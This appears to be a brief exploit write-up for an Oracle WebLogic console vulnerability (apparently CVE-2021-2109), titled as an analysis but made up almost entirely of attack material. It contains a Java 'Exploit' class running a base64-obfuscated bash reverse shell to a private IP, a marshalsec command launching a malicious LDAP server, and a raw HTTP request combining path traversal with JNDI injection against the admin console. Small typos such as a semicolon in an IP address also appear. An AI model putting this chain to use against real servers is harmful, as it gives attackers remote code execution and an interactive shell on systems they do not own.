weblogic-CVE-2109漏洞分析

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
  public Exploit() throws Exception {
      //Process p =Runtime.getRuntime().exec(newString[]{"cmd","/c","calc.exe"});
    Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC4xMjgvNjY2NiAwPiYx|base64-d |bash"});
      InputStream is = p.getInputStream();
      BufferedReader reader = new BufferedReader(new InputStreamReader(is));
      String line;
      while((line = reader.readLine()) != null) {
          System.out.println(line);
      }
      p.waitFor();
      is.close();
      reader.close();
      p.destroy();
    }
  public static void main(String[] args) throws Exception {
    }
}

java -cp marshalsec-0.0.3-SNAPSHOT-all.jarmarshalsec.jndi.LDAPRefServer http://192.168.124.133:8000/\#Exploit 9000

GET /console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.124;133:9000/a12345;AdminServer%22) HTTP/1.1
Host: 192.168.124.165:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0;WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:ADMINCONSOLESESSION=KC0jqfXzn_Dy5s6jg9QVT79hzzFgEptBFkxDUQE_SJYogGpGLfPn!-1632926475
Connection: close